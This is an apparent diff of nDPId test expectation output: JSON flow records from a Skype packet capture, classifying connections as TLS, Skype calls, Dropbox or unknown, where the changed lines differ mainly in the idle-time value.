-00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970651380,"flow_last_seen":1431970670192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":535,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51239,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970651380,"flow_last_seen":1431970670192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":535,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51239,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970651380,"flow_last_seen":1431970670192,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":535,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51239,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00592{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970651380,"flow_last_seen":1431970670192,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":535,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51239,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970634731,"flow_last_seen":1431970661287,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":329,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":53372,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970651380,"flow_last_seen":1431970679713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51238,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970651380,"flow_last_seen":1431970679713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51238,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970687670,"flow_last_seen":1431970703163,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":51290,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970687670,"flow_last_seen":1431970703163,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":51290,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970652388,"flow_last_seen":1431970670585,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":586,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51241,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970652388,"flow_last_seen":1431970670585,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":586,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51241,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970651380,"flow_last_seen":1431970679713,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51238,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431970651380,"flow_last_seen":1431970679713,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51238,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970687670,"flow_last_seen":1431970703163,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":51290,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00597{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970687670,"flow_last_seen":1431970703163,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":290,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":51290,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970652388,"flow_last_seen":1431970670585,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":586,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51241,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970652388,"flow_last_seen":1431970670585,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":586,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51241,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970648982,"flow_last_seen":1431970679028,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970648880,"flow_last_seen":1431970678946,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00616{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970688782,"flow_last_seen":1431970692885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2561,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":51293,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970688782,"flow_last_seen":1431970692885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2561,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":51293,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970668514,"flow_last_seen":1431970686964,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":516,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51260,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970668514,"flow_last_seen":1431970686964,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":516,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51260,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970668515,"flow_last_seen":1431970686367,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.170","src_port":51261,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970668515,"flow_last_seen":1431970686367,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.170","src_port":51261,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00616{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970688782,"flow_last_seen":1431970692885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2561,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":51293,"dst_port":31010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970688782,"flow_last_seen":1431970692885,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2561,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":51293,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970668514,"flow_last_seen":1431970686964,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":516,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51260,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970668514,"flow_last_seen":1431970686964,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":516,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.142","src_port":51260,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970668515,"flow_last_seen":1431970686367,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.170","src_port":51261,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970668515,"flow_last_seen":1431970686367,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":571,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.170","src_port":51261,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1431970687261,"flow_last_seen":1431970707409,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"174.49.171.224","src_port":13021,"dst_port":32011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970677603,"flow_last_seen":1431970694432,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51274,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970677603,"flow_last_seen":1431970694432,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51274,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970684583,"flow_last_seen":1431970702158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51280,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970684583,"flow_last_seen":1431970702158,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51280,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970684583,"flow_last_seen":1431970702162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":382,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51281,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970684583,"flow_last_seen":1431970702162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":382,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.156","src_port":51281,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970677603,"flow_last_seen":1431970694432,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51274,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970677603,"flow_last_seen":1431970694432,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":522,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51274,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970684583,"flow_last_seen":1431970702158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51280,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970684583,"flow_last_seen":1431970702158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":417,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.146","src_port":51280,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 